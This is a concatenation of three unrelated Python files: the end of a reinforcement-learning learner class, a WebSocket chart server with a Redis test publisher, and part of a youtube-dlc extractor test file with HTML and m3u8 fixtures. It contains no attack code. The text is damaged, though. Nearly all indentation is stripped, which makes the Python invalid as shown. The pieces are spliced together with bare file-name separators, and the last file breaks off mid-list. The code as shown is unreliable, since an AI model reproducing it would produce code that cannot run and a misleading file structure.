def _accumulated_too_much_experience(self, rollouts):
max_minibatches_to_accumulate = self.cfg.num_minibatches_to_accumulate
if max_minibatches_to_accumulate == -1:
# default value
max_minibatches_to_accumulate = 2 * self.cfg.num_batches_per_iteration
# allow the max batches to accumulate, plus the minibatches we're currently training on
max_minibatches_on_learner = max_minibatches_to_accumulate + self.cfg.num_batches_per_iteration
minibatches_currently_training = int(self.is_training) * self.cfg.num_batches_per_iteration
rollouts_per_minibatch = self.cfg.batch_size / self.cfg.rollout
# count contribution from unprocessed rollouts
minibatches_currently_accumulated = len(rollouts) / rollouts_per_minibatch
# count minibatches ready for training
minibatches_currently_accumulated += self.experience_buffer_queue.qsize() * self.cfg.num_batches_per_iteration
total_minibatches_on_learner = minibatches_currently_training + minibatches_currently_accumulated
return total_minibatches_on_learner >= max_minibatches_on_learner
def _run(self):
self.deferred_initialization()
log.info(f'LEARNER\tpid {os.getpid()}\tparent {os.getppid()}')
# workers should ignore Ctrl+C because the termination is handled in the event loop by a special msg
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
psutil.Process().nice(self.cfg.default_niceness)
except psutil.AccessDenied:
log.error('Low niceness requires sudo!')
if self.cfg.device == 'gpu':
cuda_envvars_for_policy(self.policy_id, 'learner')
torch.multiprocessing.set_sharing_strategy('file_system')
torch.set_num_threads(self.cfg.learner_main_loop_num_cores)
timing = Timing()
rollouts = []
if self.train_in_background:
self.training_thread.start()
else:
self.initialize(timing)
log.error(
'train_in_background set to False on learner %d! This is slow, use only for testing!', self.policy_id,
)
while not self.terminate:
while True:
try:
tasks = self.task_queue.get_many(timeout=0.005)
for task_type, data in tasks:
if task_type == TaskType.TRAIN:
with timing.add_time('extract'):
rollouts.extend(self._extract_rollouts(data))
# log.debug('Learner %d has %d rollouts', self.policy_id, len(rollouts))
elif task_type == TaskType.INIT:
self._init()
elif task_type == TaskType.TERMINATE:
time.sleep(0.3)
log.info('GPU learner timing: %s', timing)
self._terminate()
break
elif task_type == TaskType.PBT:
self._process_pbt_task(data)
except Empty:
break
if self._accumulated_too_much_experience(rollouts):
# if we accumulated too much experience, signal the policy workers to stop experience collection
if not self.stop_experience_collection[self.policy_id]:
self.stop_experience_collection_num_msgs += 1
# TODO: add a logger function for this
if self.stop_experience_collection_num_msgs >= 50:
log.info(
'Learner %d accumulated too much experience, stop experience collection! '
'Learner is likely a bottleneck in your experiment (%d times)',
self.policy_id, self.stop_experience_collection_num_msgs,
)
self.stop_experience_collection_num_msgs = 0
self.stop_experience_collection[self.policy_id] = True
elif self.stop_experience_collection[self.policy_id]:
# otherwise, resume the experience collection if it was stopped
self.stop_experience_collection[self.policy_id] = False
with self.resume_experience_collection_cv:
self.resume_experience_collection_num_msgs += 1
if self.resume_experience_collection_num_msgs >= 50:
log.debug('Learner %d is resuming experience collection!', self.policy_id)
self.resume_experience_collection_num_msgs = 0
self.resume_experience_collection_cv.notify_all()
with torch.no_grad():
rollouts = self._process_rollouts(rollouts, timing)
if not self.train_in_background:
while not self.experience_buffer_queue.empty():
training_data = self.experience_buffer_queue.get()
self._process_training_data(training_data, timing)
self._experience_collection_rate_stats()
if self.train_in_background:
self.experience_buffer_queue.put(None)
self.training_thread.join()
def init(self):
self.task_queue.put((TaskType.INIT, None))
self.initialized_event.wait()
def save_model(self, timeout=None):
self.model_saved_event.clear()
save_task = (PbtTask.SAVE_MODEL, self.policy_id)
self.task_queue.put((TaskType.PBT, save_task))
log.debug('Wait while learner %d saves the model...', self.policy_id)
if self.model_saved_event.wait(timeout=timeout):
log.debug('Learner %d saved the model!', self.policy_id)
else:
log.warning('Model saving request timed out!')
self.model_saved_event.clear()
def close(self):
self.task_queue.put((TaskType.TERMINATE, None))
self.shared_buffers._stop_experience_collection[self.policy_id] = False
def join(self):
join_or_kill(self.process)
|
main.py
|
#coding:utf8
import sys
import config
from ws_server import WebSocketServer
import log
from ws_server import WebSocketMsgHandler
from pubsub import SubscribeManager
from pubsub import Publisher
import signal
import json
from charts import ChartAgent
from datasets import DBChartAgent
from threading import Thread
import time
import datasets
class DvClinetDispatcher(WebSocketMsgHandler):
def __init__(self, sub, dbc):
self.sub = sub
self.dbc = dbc
self.on_close_cb = set()
WebSocketMsgHandler.__init__(self)
def on_client_open(self, client):
WebSocketMsgHandler.on_client_open(self, client)
log.debug('open')
def handle_charts(self, data):
#{u'chart_id': u'chart', u'chart_name': u'online', u'mode': u'static', limit:20, server:'2003'}
chart_name = data['chart_name']
limit = data['limit']
server = data['server']
linestyle = data['line'];
channel = chart_name
latest = self.dbc.getLatestISK(channel, server, limit)
ca = ChartAgent(self, data['chart_id'], chart_name, linestyle)
if data['mode'] == 'static':
ca.render(channel, channel, latest)
pass
else:
#dynamic data
ca.render(channel, channel, latest)
current_value = list(latest[-1]) #time,ival,sval
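            # subscribe to live updates for this channel: apply each inc/dec delta and push the new point to the chart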
def on_recv_channel_msg(data):
if server != data['server']:
return
current_value[0] = data['time']
if data['op'] == 'inc':
current_value[1] = current_value[1] + data['value']
else:
current_value[1] = current_value[1] - data['value']
ca.update(current_value)
pass
self.sub.subscribe(channel, on_recv_channel_msg)
def on_close():
self.sub.unsubscribe(channel, on_recv_channel_msg)
self.on_close_cb.add(on_close)
pass
def on_client_message(self, jobj):
if jobj['type'] == 'charts':
self.handle_charts(jobj['data'])
def on_client_close(self):
log.debug('close')
for ocb in self.on_close_cb:
ocb()
self.on_close_cb.clear()
#unsubscribe
def main():
log.init_logger(config.LOG_FILE)
log.set_level(config.LOG_LEVEL)
sub = SubscribeManager(config.REDIS_MQ_HOST,config.REDIS_MQ_PORT,config.REDIS_MQ_DB)
dbc = DBChartAgent(config.DB_HOST, config.DB_PORT, config.DB_USER, config.DB_PASSWD, config.DB_NAME)
wss = WebSocketServer(config.WSS_URI, DvClinetDispatcher(sub, dbc), host=config.WSS_HOST, port=config.WSS_PORT)
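    # test publisher: every second adjust the 'online' counter for server '2003' by a random delta and publish it over Redis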
def test_push_online():
dbc.createKey("online")
pub = Publisher(config.REDIS_MQ_HOST, config.REDIS_MQ_PORT, config.REDIS_MQ_DB)
import random
while True:
add = random.randint(-100,100);
dbc.incKey("online","2003", add)
pub.publish('online', {'server':'2003', "op":"inc", "value":add, "time": datasets.current_ms()})
time.sleep(1)
tester = Thread(target=test_push_online)
tester.setDaemon(True)
wss.setDaemon(True)
wss.start()
tester.start()
exit_main = False
    def stop(signum=None, frame=None):
        # signal handlers are called with (signum, frame); rebind the flag from main() instead of creating a local
        nonlocal exit_main
        log.info("stop the io thread ...")
        exit_main = True
        #wss.stop()
        #tester.stop()
signal.signal(signal.SIGQUIT, stop)
while not exit_main:
sub.poll()
wss.join()
tester.join()
if __name__ == '__main__':
main()
|
test_InfoExtractor.py
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import io
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import FakeYDL, expect_dict, expect_value, http_server_port
from youtube_dlc.compat import compat_etree_fromstring, compat_http_server
from youtube_dlc.extractor.common import InfoExtractor
from youtube_dlc.extractor import YoutubeIE, get_info_extractor
from youtube_dlc.utils import encode_data_uri, strip_jsonp, ExtractorError, RegexNotFoundError
import threading
TEAPOT_RESPONSE_STATUS = 418
TEAPOT_RESPONSE_BODY = "<h1>418 I'm a teapot</h1>"
class InfoExtractorTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
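    # override to suppress BaseHTTPRequestHandler's per-request logging and keep test output clean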
def log_message(self, format, *args):
pass
def do_GET(self):
if self.path == '/teapot':
self.send_response(TEAPOT_RESPONSE_STATUS)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(TEAPOT_RESPONSE_BODY.encode())
else:
assert False
class TestIE(InfoExtractor):
pass
class TestInfoExtractor(unittest.TestCase):
def setUp(self):
self.ie = TestIE(FakeYDL())
def test_ie_key(self):
self.assertEqual(get_info_extractor(YoutubeIE.ie_key()), YoutubeIE)
def test_html_search_regex(self):
html = '<p id="foo">Watch this <a href="http://www.youtube.com/watch?v=BaW_jenozKc">video</a></p>'
search = lambda re, *args: self.ie._html_search_regex(re, html, *args)
self.assertEqual(search(r'<p id="foo">(.+?)</p>', 'foo'), 'Watch this video')
def test_opengraph(self):
ie = self.ie
html = '''
<meta name="og:title" content='Foo'/>
<meta content="Some video's description " name="og:description"/>
<meta property='og:image' content='http://domain.com/pic.jpg?key1=val1&key2=val2'/>
<meta content='application/x-shockwave-flash' property='og:video:type'>
<meta content='Foo' property=og:foobar>
<meta name="og:test1" content='foo > < bar'/>
<meta name="og:test2" content="foo >//< bar"/>
<meta property=og-test3 content='Ill-formatted opengraph'/>
'''
self.assertEqual(ie._og_search_title(html), 'Foo')
self.assertEqual(ie._og_search_description(html), 'Some video\'s description ')
self.assertEqual(ie._og_search_thumbnail(html), 'http://domain.com/pic.jpg?key1=val1&key2=val2')
self.assertEqual(ie._og_search_video_url(html, default=None), None)
self.assertEqual(ie._og_search_property('foobar', html), 'Foo')
self.assertEqual(ie._og_search_property('test1', html), 'foo > < bar')
self.assertEqual(ie._og_search_property('test2', html), 'foo >//< bar')
self.assertEqual(ie._og_search_property('test3', html), 'Ill-formatted opengraph')
self.assertEqual(ie._og_search_property(('test0', 'test1'), html), 'foo > < bar')
self.assertRaises(RegexNotFoundError, ie._og_search_property, 'test0', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._og_search_property, ('test0', 'test00'), html, None, fatal=True)
def test_html_search_meta(self):
ie = self.ie
html = '''
<meta name="a" content="1" />
<meta name='b' content='2'>
<meta name="c" content='3'>
<meta name=d content='4'>
<meta property="e" content='5' >
<meta content="6" name="f">
'''
self.assertEqual(ie._html_search_meta('a', html), '1')
self.assertEqual(ie._html_search_meta('b', html), '2')
self.assertEqual(ie._html_search_meta('c', html), '3')
self.assertEqual(ie._html_search_meta('d', html), '4')
self.assertEqual(ie._html_search_meta('e', html), '5')
self.assertEqual(ie._html_search_meta('f', html), '6')
self.assertEqual(ie._html_search_meta(('a', 'b', 'c'), html), '1')
self.assertEqual(ie._html_search_meta(('c', 'b', 'a'), html), '3')
self.assertEqual(ie._html_search_meta(('z', 'x', 'c'), html), '3')
self.assertRaises(RegexNotFoundError, ie._html_search_meta, 'z', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._html_search_meta, ('z', 'x'), html, None, fatal=True)
def test_download_json(self):
uri = encode_data_uri(b'{"foo": "blah"}', 'application/json')
self.assertEqual(self.ie._download_json(uri, None), {'foo': 'blah'})
uri = encode_data_uri(b'callback({"foo": "blah"})', 'application/javascript')
self.assertEqual(self.ie._download_json(uri, None, transform_source=strip_jsonp), {'foo': 'blah'})
uri = encode_data_uri(b'{"foo": invalid}', 'application/json')
self.assertRaises(ExtractorError, self.ie._download_json, uri, None)
self.assertEqual(self.ie._download_json(uri, None, fatal=False), None)
def test_parse_html5_media_entries(self):
# from https://www.r18.com/
# with kpbs in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.r18.com/',
r'''
<video id="samplevideo_amateur" class="js-samplevideo video-js vjs-default-skin vjs-big-play-centered" controls preload="auto" width="400" height="225" poster="//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4" type="video/mp4" res="240" label="300kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4" type="video/mp4" res="480" label="1000kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4" type="video/mp4" res="740" label="1500kbps">
<p>Your browser does not support the video tag.</p>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4',
'ext': 'mp4',
'format_id': '300kbps',
'height': 240,
'tbr': 300,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4',
'ext': 'mp4',
'format_id': '1000kbps',
'height': 480,
'tbr': 1000,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4',
'ext': 'mp4',
'format_id': '1500kbps',
'height': 740,
'tbr': 1500,
}],
'thumbnail': '//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg'
})
# from https://www.csfd.cz/
# with width and height
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.csfd.cz/',
r'''
<video width="770" height="328" preload="none" controls poster="https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360" >
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4" type="video/mp4" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4" type="video/mp4" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4" type="video/mp4" width="1920" height="1080">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm" type="video/webm" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm" type="video/webm" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm" type="video/webm" width="1920" height="1080">
<track src="https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt" type="text/x-srt" kind="subtitles" srclang="cs" label="cs">
</video>
''', None)[0],
{
'formats': [{
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4',
'ext': 'mp4',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4',
'ext': 'mp4',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4',
'ext': 'mp4',
'width': 1920,
'height': 1080,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm',
'ext': 'webm',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm',
'ext': 'webm',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm',
'ext': 'webm',
'width': 1920,
'height': 1080,
}],
'subtitles': {
'cs': [{'url': 'https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt'}]
},
'thumbnail': 'https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360'
})
# from https://tamasha.com/v/Kkdjw
# with height in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://tamasha.com/v/Kkdjw',
r'''
<video crossorigin="anonymous">
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4" label="AUTO" res="0"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4"
label="240p" res="240"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4" type="video/mp4"
label="144p" res="144"/>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
}, {
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
'ext': 'mp4',
'format_id': '240p',
'height': 240,
}, {
'url': 'https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4',
'ext': 'mp4',
'format_id': '144p',
'height': 144,
}]
})
# from https://www.directvnow.com
# with data-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video id="vid1" class="header--video-masked active" muted playsinline>
<source data-src="https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'ext': 'mp4',
'url': 'https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4',
}]
})
# from https://www.klarna.com/uk/
# with data-video-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video loop autoplay muted class="responsive-video block-kl__video video-on-medium">
<source src="" data-video-desktop data-video-src="https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'url': 'https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4',
'ext': 'mp4',
}],
})
def test_extract_jwplayer_data_realworld(self):
# from http://www.suffolk.edu/sjc/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type='text/javascript'>
jwplayer('my-video').setup({
file: 'rtmp://192.138.214.154/live/sjclive',
fallback: 'true',
width: '95%',
aspectratio: '16:9',
primary: 'flash',
mediaid:'XEgvuql4'
});
</script>
''', None, require_title=False),
{
'id': 'XEgvuql4',
'formats': [{
'url': 'rtmp://192.138.214.154/live/sjclive',
'ext': 'flv'
}]
})
# from https://www.pornoxo.com/videos/7564/striptease-from-sexy-secretary/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type="text/javascript">
jwplayer("mediaplayer").setup({
'videoid': "7564",
'width': "100%",
'aspectratio': "16:9",
'stretching': "exactfit",
'autostart': 'false',
'flashplayer': "https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf",
'file': "https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv",
'image': "https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg",
'filefallback': "https://cdn.pornoxo.com/key=9ZPsTR5EvPLQrBaak2MUGA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/m_4b2157147afe5efa93ce1978e0265289c193874e02597.mp4",
'logo.hide': true,
'skin': "https://t04.vipstreamservice.com/jwplayer/skin/modieus-blk.zip",
'plugins': "https://t04.vipstreamservice.com/jwplayer/dock/dockableskinnableplugin.swf",
'dockableskinnableplugin.piclink': "/index.php?key=ajax-videothumbsn&vid=7564&data=2009-12--14--4b2157147afe5efa93ce1978e0265289c193874e02597.flv--17370",
'controlbar': 'bottom',
'modes': [
{type: 'flash', src: 'https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf'}
],
'provider': 'http'
});
//noinspection JSAnnotator
invideo.setup({
adsUrl: "/banner-iframe/?zoneId=32",
adsUrl2: "",
autostart: false
});
</script>
''', 'dummy', require_title=False),
{
'thumbnail': 'https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg',
'formats': [{
'url': 'https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv',
'ext': 'flv'
}]
})
# from http://www.indiedb.com/games/king-machine/videos
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script>
jwplayer("mediaplayer").setup({"abouttext":"Visit Indie DB","aboutlink":"http:\/\/www.indiedb.com\/","displaytitle":false,"autostart":false,"repeat":false,"title":"king machine trailer 1","sharing":{"link":"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1","code":"<iframe width=\"560\" height=\"315\" src=\"http:\/\/www.indiedb.com\/media\/iframe\/1522983\" frameborder=\"0\" allowfullscreen><\/iframe><br><a href=\"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1\">king machine trailer 1 - Indie DB<\/a>"},"related":{"file":"http:\/\/rss.indiedb.com\/media\/recommended\/1522983\/feed\/rss.xml","dimensions":"160x120","onclick":"link"},"sources":[{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode_mp4\/king-machine-trailer.mp4","label":"360p SD","default":"true"},{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode720p_mp4\/king-machine-trailer.mp4","label":"720p HD"}],"image":"http:\/\/media.indiedb.com\/cache\/images\/games\/1\/50\/49678\/thumb_620x2000\/king-machine-trailer.mp4.jpg","advertising":{"client":"vast","tag":"http:\/\/ads.intergi.com\/adrawdata\/3.0\/5205\/4251742\/0\/1013\/ADTECH;cors=yes;width=560;height=315;referring_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;content_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;media_id=1522983;title=king+machine+trailer+1;device=__DEVICE__;model=__MODEL__;os=Windows+OS;osversion=__OSVERSION__;ua=__UA__;ip=109.171.17.81;uniqueid=1522983;tags=__TAGS__;number=58cac25928151;time=1489683033"},"width":620,"height":349}).once("play", function(event) {
videoAnalytics("play");
}).once("complete", function(event) {
videoAnalytics("completed");
});
</script>
''', 'dummy'),
{
'title': 'king machine trailer 1',
'thumbnail': 'http://media.indiedb.com/cache/images/games/1/50/49678/thumb_620x2000/king-machine-trailer.mp4.jpg',
'formats': [{
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode_mp4/king-machine-trailer.mp4',
'height': 360,
'ext': 'mp4'
}, {
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode720p_mp4/king-machine-trailer.mp4',
'height': 720,
'ext': 'mp4'
}]
})
def test_parse_m3u8_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/11507
# http://pluzz.francetv.fr/videos/le_ministere.html
'pluzz_francetv_11507',
'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
[{
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_0_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '180',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.66.30',
'tbr': 180,
'width': 256,
'height': 144,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_1_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '303',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.66.30',
'tbr': 303,
'width': 320,
'height': 180,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_2_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '575',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.66.30',
'tbr': 575,
'width': 512,
'height': 288,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_3_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '831',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.77.30',
'tbr': 831,
'width': 704,
'height': 396,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_4_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'protocol': 'm3u8',
'format_id': '1467',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.77.30',
'tbr': 1467,
'width': 1024,
'height': 576,
}]
),
(
# https://github.com/ytdl-org/youtube-dl/issues/11995
# http://teamcoco.com/video/clueless-gamer-super-bowl-for-honor
'teamcoco_11995',
'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
[{
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-audio-160k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': 'audio-0-Default',
'protocol': 'm3u8',
'vcodec': 'none',
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-audio-64k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': 'audio-1-Default',
'protocol': 'm3u8',
'vcodec': 'none',
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-audio-64k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '71',
'protocol': 'm3u8',
'acodec': 'mp4a.40.5',
'vcodec': 'none',
'tbr': 71,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-400k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '413',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.42001e',
'tbr': 413,
'width': 400,
'height': 224,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-400k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '522',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.42001e',
'tbr': 522,
'width': 400,
'height': 224,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-1m_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '1205',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.4d001e',
'tbr': 1205,
'width': 640,
'height': 360,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-2m_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '2374',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 2374,
'width': 1024,
'height': 576,
}]
),
(
# https://github.com/ytdl-org/youtube-dl/issues/12211
# http://video.toggle.sg/en/series/whoopie-s-world/ep3/478601
'toggle_mobile_12211',
'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
[{
